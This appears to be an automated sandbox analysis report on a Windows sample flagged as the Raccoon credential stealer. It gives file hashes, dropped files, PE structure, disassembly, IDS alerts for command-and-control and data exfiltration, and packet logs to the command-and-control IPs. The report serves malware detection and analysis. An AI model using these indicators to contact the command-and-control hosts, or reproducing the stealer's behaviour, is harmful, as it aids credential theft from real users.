                                                                                                                                                  SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                                                                                                                  SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\sqlite3.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):916735
                                                                                                                                                  Entropy (8bit):6.514932604208782
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
                                                                                                                                                  MD5:F964811B68F9F1487C2B41E1AEF576CE
                                                                                                                                                  SHA1:B423959793F14B1416BC3B7051BED58A1034025F
                                                                                                                                                  SHA-256:83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
                                                                                                                                                  SHA-512:565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........
                                                                                                                                                  C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1572864
                                                                                                                                                  Entropy (8bit):4.257824926690192
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:LOAl0Th31Tnp7TSP84s4YwMMpyd8R9spgln2cRDPFMx+rAxsCfD3m3Z5:6Al0Th31Tnp7TSPXHAU5
                                                                                                                                                  MD5:3A3C0B6FD66B072CA00B2B4DCD9155A0
                                                                                                                                                  SHA1:9FF30E3724757ACBBDDD4F6BFB2B1B5FDF2FF72F
                                                                                                                                                  SHA-256:611203308DE825BE3FB8B2B2087E06EA4A5D27F3F24F2BAF968EBDE058631388
                                                                                                                                                  SHA-512:1C59D533C1741C83DEC1B2C0B3C033FDA803F07BF99D2CB9AF51F85ADF3D3E060F31F8A523F9D6DA7CE5CEA427BFBAB48BCBDF2EA1D059F963DF5CF36E86301F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm....l..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  \Device\Null
                                                                                                                                                  Process:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):92
                                                                                                                                                  Entropy (8bit):4.300553674183507
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:hYFEHgARcWmFsFJQZtctFst3g4t32vov:hYFE1mFSQZi3MXt3X
                                                                                                                                                  MD5:F74899957624A2837F2F86E8E62E92D4
                                                                                                                                                  SHA1:1FCDAC5DEC5B0B1E00CF0247DA2A5F18566F1431
                                                                                                                                                  SHA-256:507992A303C447D1D40D36E2E5163A237077B94F23A7089AC90A2F08682AE9BC
                                                                                                                                                  SHA-512:E3FD14728633614B6552A75C15079AC8B04C0E8B3F49535B522C73312B1C812E30A934099AB18B507A0B4878068987D5545E90FA3747F7E7B10360EE324DB435
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ..Waiting for 10 seconds, press CTRL+C to quit ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Entropy (8bit):7.633921763622032
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                  • Clipper DOS Executable (2020/12) 0.02%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                  • VXD Driver (31/22) 0.00%
                                                                                                                                                  File name:Tk6dsSEyOC.exe
                                                                                                                                                  File size:437760
                                                                                                                                                  MD5:3613e68843dd0c745f079a6ef51a6e6a
                                                                                                                                                  SHA1:87f91a8e3bf01475cf3fe5a690374f95a4fb66c2
                                                                                                                                                  SHA256:271453e30f708718f175654f2b3fb5f4438effb11a928656d58f0051b424c740
                                                                                                                                                  SHA512:fca6650bdab6e1b9fde7d6fe55612a8cdaabb327b7a8fc8d1d749b3b36ab6d43d195e27dc8de0be4f3eeac1fe574145bfc0894a2c3de84573a85c631a1d10618
                                                                                                                                                  SSDEEP:6144:sPO46PU+HbaWxhYFT8F3tPEucq5Aq4Jsm3EsOVXc1XNfdBdEHJAU8tjBWk9K:a2PUyVbGwF3tErq5csmJOS9vM8t
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......`...

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:acfc16b6b694c6e2

                                                                                                                                                  Static PE Info

                                                                                                                                                  General

                                                                                                                                                  Entrypoint:0x402c9b
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                                  Time Stamp:0x60B101BE [Fri May 28 14:44:14 2021 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:5
                                                                                                                                                  OS Version Minor:1
                                                                                                                                                  File Version Major:5
                                                                                                                                                  File Version Minor:1
                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                                  Import Hash:f8393510f2f8b91965f5a1e620e0469d

                                                                                                                                                  Entrypoint Preview

                                                                                                                                                  Instruction
                                                                                                                                                  call 00007FB8BCFD9B95h
                                                                                                                                                  jmp 00007FB8BCFD6FCEh
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  call 00007FB8BCFD717Ch
                                                                                                                                                  xchg cl, ch
                                                                                                                                                  jmp 00007FB8BCFD7164h
                                                                                                                                                  call 00007FB8BCFD7173h
                                                                                                                                                  fxch st(0), st(1)
                                                                                                                                                  jmp 00007FB8BCFD715Bh
                                                                                                                                                  fabs
                                                                                                                                                  fld1
                                                                                                                                                  mov ch, cl
                                                                                                                                                  xor cl, cl
                                                                                                                                                  jmp 00007FB8BCFD7151h
                                                                                                                                                  mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                                                                                                                  fabs
                                                                                                                                                  fxch st(0), st(1)
                                                                                                                                                  fabs
                                                                                                                                                  fxch st(0), st(1)
                                                                                                                                                  fpatan
                                                                                                                                                  or cl, cl
                                                                                                                                                  je 00007FB8BCFD7146h
                                                                                                                                                  fldpi
                                                                                                                                                  fsubrp st(1), st(0)
                                                                                                                                                  or ch, ch
                                                                                                                                                  je 00007FB8BCFD7144h
                                                                                                                                                  fchs
                                                                                                                                                  ret
                                                                                                                                                  fabs
                                                                                                                                                  fld st(0), st(0)
                                                                                                                                                  fld st(0), st(0)
                                                                                                                                                  fld1
                                                                                                                                                  fsubrp st(1), st(0)
                                                                                                                                                  fxch st(0), st(1)
                                                                                                                                                  fld1
                                                                                                                                                  faddp st(1), st(0)
                                                                                                                                                  fmulp st(1), st(0)
                                                                                                                                                  ftst
                                                                                                                                                  wait
                                                                                                                                                  fstsw word ptr [ebp-000000A0h]
                                                                                                                                                  wait
                                                                                                                                                  test byte ptr [ebp-0000009Fh], 00000001h
                                                                                                                                                  jne 00007FB8BCFD7147h
                                                                                                                                                  xor ch, ch
                                                                                                                                                  fsqrt
                                                                                                                                                  ret
                                                                                                                                                  pop eax
                                                                                                                                                  jmp 00007FB8BCFD9D5Fh
                                                                                                                                                  fstp st(0)
                                                                                                                                                  fld tbyte ptr [0045CD7Ah]
                                                                                                                                                  ret
                                                                                                                                                  fstp st(0)
                                                                                                                                                  or cl, cl
                                                                                                                                                  je 00007FB8BCFD714Dh
                                                                                                                                                  fstp st(0)
                                                                                                                                                  fldpi
                                                                                                                                                  or ch, ch
                                                                                                                                                  je 00007FB8BCFD7144h
                                                                                                                                                  fchs
                                                                                                                                                  ret
                                                                                                                                                  fstp st(0)
                                                                                                                                                  fldz
                                                                                                                                                  or ch, ch
                                                                                                                                                  je 00007FB8BCFD7139h
                                                                                                                                                  fchs
                                                                                                                                                  ret
                                                                                                                                                  fstp st(0)
                                                                                                                                                  jmp 00007FB8BCFD9D35h
                                                                                                                                                  fstp st(0)
                                                                                                                                                  mov cl, ch
                                                                                                                                                  jmp 00007FB8BCFD7142h
                                                                                                                                                  call 00007FB8BCFD710Eh
                                                                                                                                                  jmp 00007FB8BCFD9D40h
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  push ebp
                                                                                                                                                  mov ebp, esp

                                                                                                                                                  Data Directories

                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x62f540x78.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x6b0000x75f0.rsrc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x5c1c00x1c.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5dcc80x40.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x5c0000x17c.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                  Sections

                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                  .text0x10000x5a0400x5a200False0.950418797677data7.95634126707IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rdata0x5c0000x78260x7a00False0.127113217213PGP symmetric key encrypted data - Plaintext or unencrypted data2.1008713251IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .data0x640000x629c0x1800False0.265299479167data2.83664965466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rsrc0x6b0000x255f00x7600False0.676310911017data6.23037826456IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                  Resources

                                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                                  RT_ICON0x6b3600xea8dataItalianSwitzerland
                                                                                                                                                  RT_ICON0x6c2080x8a8dataItalianSwitzerland
                                                                                                                                                  RT_ICON0x6cab00x6c8dataItalianSwitzerland
                                                                                                                                                  RT_ICON0x6d1780x568GLS_BINARY_LSB_FIRSTItalianSwitzerland
                                                                                                                                                  RT_ICON0x6d6e00x25a8dataItalianSwitzerland
                                                                                                                                                  RT_ICON0x6fc880x10a8dataItalianSwitzerland
                                                                                                                                                  RT_ICON0x70d300x988dataItalianSwitzerland
                                                                                                                                                  RT_ICON0x716b80x468GLS_BINARY_LSB_FIRSTItalianSwitzerland
                                                                                                                                                  RT_STRING0x71da00x1f8data
                                                                                                                                                  RT_STRING0x71f980x3e4data
                                                                                                                                                  RT_STRING0x723800x26edata
                                                                                                                                                  RT_ACCELERATOR0x71b980x40data
                                                                                                                                                  RT_ACCELERATOR0x71bd80x18data
                                                                                                                                                  RT_GROUP_ICON0x71b200x76dataItalianSwitzerland
                                                                                                                                                  RT_VERSION0x71bf00x1b0data

                                                                                                                                                  Imports

                                                                                                                                                  DLLImport
                                                                                                                                                  KERNEL32.dllSetEndOfFile, MapUserPhysicalPages, GetEnvironmentStringsW, WaitForSingleObject, EnumCalendarInfoExW, GetConsoleAliasesA, GetConsoleAliasesLengthA, GlobalAlloc, GetConsoleMode, GetLocaleInfoW, GetFileAttributesA, HeapValidate, GetLocaleInfoA, GetHandleInformation, SetLastError, GetThreadLocale, GetProcAddress, VirtualAlloc, GetFirmwareEnvironmentVariableW, LoadLibraryA, CreateHardLinkW, SetSystemTime, FindNextFileW, GetConsoleTitleW, EnumDateFormatsW, EndUpdateResourceA, CommConfigDialogW, WriteConsoleW, HeapReAlloc, GetStringTypeW, DecodePointer, EncodePointer, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapAlloc, GetLastError, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, SetFilePointer, EnterCriticalSection, LeaveCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapFree, CloseHandle, LoadLibraryW, WriteFile, GetModuleFileNameW, FreeEnvironmentStringsW, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, Sleep, SetStdHandle, RtlUnwind, WideCharToMultiByte, GetConsoleCP, FlushFileBuffers, HeapSize, RaiseException, IsProcessorFeaturePresent, LCMapStringW, MultiByteToWideChar, CreateFileW
                                                                                                                                                  USER32.dllSetCaretPos
                                                                                                                                                  ADVAPI32.dllGetOldestEventLogRecord
                                                                                                                                                  ole32.dllCoRevokeMallocSpy
                                                                                                                                                  MSIMG32.dllTransparentBlt

                                                                                                                                                  Version Infos

                                                                                                                                                  DescriptionData
                                                                                                                                                  InternalNamebomgpiaruci.iwa
                                                                                                                                                  ProductVersion13.54.77.27
                                                                                                                                                  CopyrightCopyrighz (C) 2021, fudkat
                                                                                                                                                  Translation0x0114 0x046a

                                                                                                                                                  Possible Origin

                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                  ItalianSwitzerland

                                                                                                                                                  Network Behavior

                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                  11/25/21-18:24:08.763430TCP2033973ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)4976780192.168.2.591.219.236.69
                                                                                                                                                  11/25/21-18:24:12.924736TCP2033973ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)4976780192.168.2.591.219.236.69
                                                                                                                                                  11/25/21-18:24:45.701367TCP2033974ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt4976780192.168.2.591.219.236.69

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Nov 25, 2021 18:23:23.874478102 CET4971380192.168.2.591.219.236.162
                                                                                                                                                  Nov 25, 2021 18:23:26.875086069 CET4971380192.168.2.591.219.236.162
                                                                                                                                                  Nov 25, 2021 18:23:28.286318064 CET4973680192.168.2.591.219.236.162
                                                                                                                                                  Nov 25, 2021 18:23:31.297355890 CET4973680192.168.2.591.219.236.162
                                                                                                                                                  Nov 25, 2021 18:23:31.755031109 CET4975180192.168.2.5185.163.47.176
                                                                                                                                                  Nov 25, 2021 18:23:34.766413927 CET4975180192.168.2.5185.163.47.176
                                                                                                                                                  Nov 25, 2021 18:23:36.272449017 CET4975280192.168.2.5185.163.47.176
                                                                                                                                                  Nov 25, 2021 18:23:39.298088074 CET4975280192.168.2.5185.163.47.176
                                                                                                                                                  Nov 25, 2021 18:23:39.755024910 CET4975380192.168.2.5193.38.54.238
                                                                                                                                                  Nov 25, 2021 18:23:42.767122030 CET4975380192.168.2.5193.38.54.238
                                                                                                                                                  Nov 25, 2021 18:23:44.305865049 CET4975480192.168.2.5193.38.54.238
                                                                                                                                                  Nov 25, 2021 18:23:47.314407110 CET4975480192.168.2.5193.38.54.238
                                                                                                                                                  Nov 25, 2021 18:23:47.756500006 CET4975580192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:23:47.779720068 CET804975574.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:23:48.283265114 CET4975580192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:23:48.306588888 CET804975574.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:23:48.814560890 CET4975580192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:23:48.837424040 CET804975574.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:23:49.901186943 CET4975680192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:23:49.924388885 CET804975674.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:23:50.439625025 CET4975680192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:23:50.462948084 CET804975674.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:23:50.970979929 CET4975680192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:23:50.995932102 CET804975674.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:23:52.009668112 CET4975780192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:23:52.037869930 CET804975774.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:23:52.549144030 CET4975780192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:23:52.577369928 CET804975774.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:23:53.080471992 CET4975780192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:23:53.108712912 CET804975774.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:23:54.126415014 CET4975880192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:23:54.154844046 CET804975874.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:23:54.658739090 CET4975880192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:23:54.686734915 CET804975874.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:23:55.190009117 CET4975880192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:23:55.218128920 CET804975874.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:23:56.952084064 CET4976180192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:23:56.980057955 CET804976174.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:23:57.487088919 CET4976180192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:23:57.515182018 CET804976174.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:23:58.096529007 CET4976180192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:23:58.124644041 CET804976174.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:23:59.274697065 CET4976280192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:23:59.302680016 CET804976274.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:00.002902031 CET4976280192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:24:00.031686068 CET804976274.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:00.597295046 CET4976280192.168.2.574.119.192.122
                                                                                                                                                  Nov 25, 2021 18:24:00.627142906 CET804976274.119.192.122192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:00.638149023 CET4976380192.168.2.591.219.236.240
                                                                                                                                                  Nov 25, 2021 18:24:03.643809080 CET4976380192.168.2.591.219.236.240
                                                                                                                                                  Nov 25, 2021 18:24:04.275428057 CET4976480192.168.2.591.219.236.240
                                                                                                                                                  Nov 25, 2021 18:24:07.284768105 CET4976480192.168.2.591.219.236.240
                                                                                                                                                  Nov 25, 2021 18:24:07.856148005 CET49766443192.168.2.5149.154.167.99
                                                                                                                                                  Nov 25, 2021 18:24:07.856203079 CET44349766149.154.167.99192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:07.856292009 CET49766443192.168.2.5149.154.167.99
                                                                                                                                                  Nov 25, 2021 18:24:07.861891031 CET49766443192.168.2.5149.154.167.99
                                                                                                                                                  Nov 25, 2021 18:24:07.861917019 CET44349766149.154.167.99192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:07.932213068 CET44349766149.154.167.99192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:07.932326078 CET49766443192.168.2.5149.154.167.99
                                                                                                                                                  Nov 25, 2021 18:24:07.936687946 CET49766443192.168.2.5149.154.167.99
                                                                                                                                                  Nov 25, 2021 18:24:07.936717987 CET44349766149.154.167.99192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:07.937306881 CET44349766149.154.167.99192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:07.987931967 CET49766443192.168.2.5149.154.167.99
                                                                                                                                                  Nov 25, 2021 18:24:08.270124912 CET49766443192.168.2.5149.154.167.99
                                                                                                                                                  Nov 25, 2021 18:24:08.315391064 CET44349766149.154.167.99192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:08.315431118 CET44349766149.154.167.99192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:08.315443039 CET44349766149.154.167.99192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:08.315516949 CET44349766149.154.167.99192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:08.315612078 CET49766443192.168.2.5149.154.167.99
                                                                                                                                                  Nov 25, 2021 18:24:08.315649033 CET49766443192.168.2.5149.154.167.99
                                                                                                                                                  Nov 25, 2021 18:24:08.316802979 CET49766443192.168.2.5149.154.167.99
                                                                                                                                                  Nov 25, 2021 18:24:08.316832066 CET44349766149.154.167.99192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:08.316900015 CET49766443192.168.2.5149.154.167.99
                                                                                                                                                  Nov 25, 2021 18:24:08.316914082 CET44349766149.154.167.99192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:08.325546980 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:08.362797022 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:08.363044977 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:08.364319086 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:08.364443064 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:08.401537895 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:08.401561975 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:08.741292000 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:08.741322994 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:08.741344929 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:08.741368055 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:08.741391897 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:08.741413116 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:08.741436005 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:08.741453886 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:08.741482019 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:08.741573095 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:08.763430119 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:08.800834894 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.047899008 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.047931910 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.047950029 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.047974110 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.048055887 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.048079014 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.048084974 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.048101902 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.048125029 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.048132896 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.048171043 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.048194885 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.048228025 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.048276901 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.091954947 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.091991901 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.092015982 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.092041969 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.092067957 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.092092991 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.092118025 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.092139006 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.092148066 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.092220068 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.092398882 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.092427969 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.092452049 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.092478037 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.092489004 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.092504978 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.092530966 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:09.092551947 CET4976780192.168.2.591.219.236.69
